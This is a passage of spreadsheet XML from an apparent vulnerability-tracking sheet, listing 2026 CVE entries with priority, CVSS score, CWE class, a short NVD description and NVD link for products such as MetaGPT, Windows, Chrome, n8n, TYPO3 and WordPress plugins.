        </is>
      </c>
      <c r="G1167" s="5" t="inlineStr"/>
      <c r="H1167" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1167" s="5" t="inlineStr"/>
      <c r="J1167" s="5" t="inlineStr"/>
      <c r="K1167" s="5" t="inlineStr"/>
      <c r="L1167" s="5" t="inlineStr"/>
      <c r="M1167" s="5" t="inlineStr"/>
      <c r="N1167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1167" s="5" t="inlineStr"/>
      <c r="Q1167" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1167" s="5" t="inlineStr">
        <is>
          <t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="S1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79407</t>
        </is>
      </c>
      <c r="D1168" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1168" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1168" s="5" t="inlineStr"/>
      <c r="H1168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1168" s="5" t="inlineStr"/>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr"/>
      <c r="L1168" s="5" t="inlineStr"/>
      <c r="M1168" s="5" t="inlineStr"/>
      <c r="N1168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1168" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1168" s="5" t="inlineStr"/>
      <c r="Q1168" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1168" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in the SPO extension of MetaGPT 0.8.1 allows an attacker to read arbitrary files via the FILE_NAME value used by set_file_name() and load_meta_data() in metagpt/ext/spo/utils/load.py. The vulnerable code joins the attacker-controlled FILE_NAME value with the settings directory and opens the resulting path without validating that the resolved path remains within the intended directory.</t>
        </is>
      </c>
      <c r="S1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79407</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79572</t>
        </is>
      </c>
      <c r="D1169" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1169" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1169" s="5" t="inlineStr"/>
      <c r="H1169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1169" s="5" t="inlineStr"/>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr"/>
      <c r="L1169" s="5" t="inlineStr"/>
      <c r="M1169" s="5" t="inlineStr"/>
      <c r="N1169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1169" s="5" t="inlineStr"/>
      <c r="Q1169" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1169" s="5" t="inlineStr">
        <is>
          <t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t>
        </is>
      </c>
      <c r="S1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79575</t>
        </is>
      </c>
      <c r="D1170" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1170" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1170" s="5" t="inlineStr"/>
      <c r="H1170" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1170" s="5" t="inlineStr"/>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr"/>
      <c r="L1170" s="5" t="inlineStr"/>
      <c r="M1170" s="5" t="inlineStr"/>
      <c r="N1170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1170" s="5" t="inlineStr"/>
      <c r="Q1170" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="R1170" s="5" t="inlineStr">
        <is>
          <t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t>
        </is>
      </c>
      <c r="S1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81270</t>
        </is>
      </c>
      <c r="D1171" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1171" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1171" s="5" t="inlineStr"/>
      <c r="H1171" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1171" s="5" t="inlineStr"/>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr"/>
      <c r="L1171" s="5" t="inlineStr"/>
      <c r="M1171" s="5" t="inlineStr"/>
      <c r="N1171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1171" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1171" s="5" t="inlineStr"/>
      <c r="Q1171" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1171" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: exposure of non-public information via search.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81270</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81355</t>
        </is>
      </c>
      <c r="D1172" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1172" s="5" t="inlineStr"/>
      <c r="H1172" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1172" s="5" t="inlineStr"/>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr"/>
      <c r="L1172" s="5" t="inlineStr"/>
      <c r="M1172" s="5" t="inlineStr"/>
      <c r="N1172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1172" s="5" t="inlineStr"/>
      <c r="Q1172" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1172" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81381</t>
        </is>
      </c>
      <c r="D1173" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1173" s="5" t="inlineStr"/>
      <c r="H1173" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1173" s="5" t="inlineStr"/>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L1173" s="5" t="inlineStr"/>
      <c r="M1173" s="5" t="inlineStr"/>
      <c r="N1173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1173" s="5" t="inlineStr"/>
      <c r="Q1173" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1173" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81790</t>
        </is>
      </c>
      <c r="D1174" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1174" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1174" s="5" t="inlineStr"/>
      <c r="H1174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1174" s="5" t="inlineStr"/>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr"/>
      <c r="L1174" s="5" t="inlineStr"/>
      <c r="M1174" s="5" t="inlineStr"/>
      <c r="N1174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1174" s="5" t="inlineStr"/>
      <c r="Q1174" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1174" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t>
        </is>
      </c>
      <c r="S1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D1175" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1175" s="5" t="inlineStr"/>
      <c r="H1175" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1175" s="5" t="inlineStr"/>
      <c r="J1175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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75" s="5" t="inlineStr"/>
      <c r="M1175" s="5" t="inlineStr"/>
      <c r="N1175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1175" s="5" t="inlineStr"/>
      <c r="Q1175" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1175" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D1176" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1176" s="5" t="inlineStr"/>
      <c r="H1176" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1176" s="5" t="inlineStr"/>
      <c r="J1176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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76" s="5" t="inlineStr"/>
      <c r="M1176" s="5" t="inlineStr"/>
      <c r="N1176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1176" s="5" t="inlineStr"/>
      <c r="Q1176" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1176" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84219</t>
        </is>
      </c>
      <c r="D1177" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1177" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1177" s="5" t="inlineStr"/>
      <c r="H1177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1177" s="5" t="inlineStr"/>
      <c r="J1177" s="5" t="inlineStr"/>
      <c r="K1177" s="5" t="inlineStr"/>
      <c r="L1177" s="5" t="inlineStr"/>
      <c r="M1177" s="5" t="inlineStr"/>
      <c r="N1177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1177" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1177" s="5" t="inlineStr"/>
      <c r="Q1177" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1177" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not hold back every spelling of the HTML entities it decodes when rendering, allowing unauthenticated users to store JavaScript in a comment which then runs in the session of anyone viewing a page that displays it, including an administrator, and on every page of the site when its header or footer is built to show comments.</t>
        </is>
      </c>
      <c r="S1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84219</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85045</t>
        </is>
      </c>
      <c r="D1178" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1178" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1178" s="5" t="inlineStr"/>
      <c r="H1178" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1178" s="5" t="inlineStr"/>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1178" s="5" t="inlineStr"/>
      <c r="M1178" s="5" t="inlineStr"/>
      <c r="N1178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1178" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1178" s="5" t="inlineStr"/>
      <c r="Q1178" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1178" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85045</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85155</t>
        </is>
      </c>
      <c r="D1179" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1179" s="5" t="inlineStr"/>
      <c r="H1179" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1179" s="5" t="inlineStr"/>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr"/>
      <c r="L1179" s="5" t="inlineStr"/>
      <c r="M1179" s="5" t="inlineStr"/>
      <c r="N1179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1179" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1179" s="5" t="inlineStr"/>
      <c r="Q1179" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1179" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a SQL injection vulnerability in the sort column parameter of the get.json.php endpoint with APIName=channels that allows unauthenticated attackers to order results by arbitrary database columns including users.password and users.recoverPass. Attackers can exploit this ordering oracle to infer password hash values and recovery tokens, and trigger SQL errors that disclose the full query statement and database schema.</t>
        </is>
      </c>
      <c r="S1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85155</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85400</t>
        </is>
      </c>
      <c r="D1180" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1180" s="5" t="inlineStr">
        <is>
          <t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t>
        </is>
      </c>
      <c r="G1180" s="5" t="inlineStr"/>
      <c r="H1180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1180" s="5" t="inlineStr"/>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr"/>
      <c r="L1180" s="5" t="inlineStr"/>
      <c r="M1180" s="5" t="inlineStr"/>
      <c r="N1180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1180" s="5" t="inlineStr"/>
      <c r="Q1180" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-862</t>
        </is>
      </c>
      <c r="R1180" s="5" t="inlineStr">
        <is>
          <t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t>
        </is>
      </c>
      <c r="S1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86075</t>
        </is>
      </c>
      <c r="D1181" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1181" s="5" t="inlineStr"/>
      <c r="H1181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1181" s="5" t="inlineStr"/>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L1181" s="5" t="inlineStr"/>
      <c r="M1181" s="5" t="inlineStr"/>
      <c r="N1181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1181" s="5" t="inlineStr"/>
      <c r="Q1181" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1181" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the OAuth Dynamic Client Registration endpoint bounded redirect_uris but accepted arbitrarily large client_name and grant_types values. An unauthenticated remote caller could repeatedly persist oversized values in oauth_clients and exhaust database storage. The affected validation is in packages/cli/src/modules/oauth-server/oauth-server.service.ts, including MAX_CLIENT_NAME_LENGTH and MAX_GRANT_TYPES. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="S1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86250</t>
        </is>
      </c>
      <c r="D1182" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1182" s="5" t="inlineStr"/>
      <c r="H1182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1182" s="5" t="inlineStr"/>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr"/>
      <c r="L1182" s="5" t="inlineStr"/>
      <c r="M1182" s="5" t="inlineStr"/>
      <c r="N1182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1182" s="5" t="inlineStr"/>
      <c r="Q1182" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1182" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 2.0.1-rc.18 fail to validate the chunk count parsed from user-controlled cookie values in setChunkedCookie() and deleteChunkedCookie() functions. Attackers can send a crafted cookie header with an extremely large chunk count to trigger an O(n²) cleanup loop that hangs the server process.</t>
        </is>
      </c>
      <c r="S1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86250</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86711</t>
        </is>
      </c>
      <c r="D1183" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1183" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1183" s="5" t="inlineStr"/>
      <c r="H1183" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1183" s="5" t="inlineStr"/>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr"/>
      <c r="L1183" s="5" t="inlineStr"/>
      <c r="M1183" s="5" t="inlineStr"/>
      <c r="N1183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1183" s="5" t="inlineStr"/>
      <c r="Q1183" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R1183" s="5" t="inlineStr">
        <is>
          <t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t>
        </is>
      </c>
      <c r="S1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86721</t>
        </is>
      </c>
      <c r="D1184" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
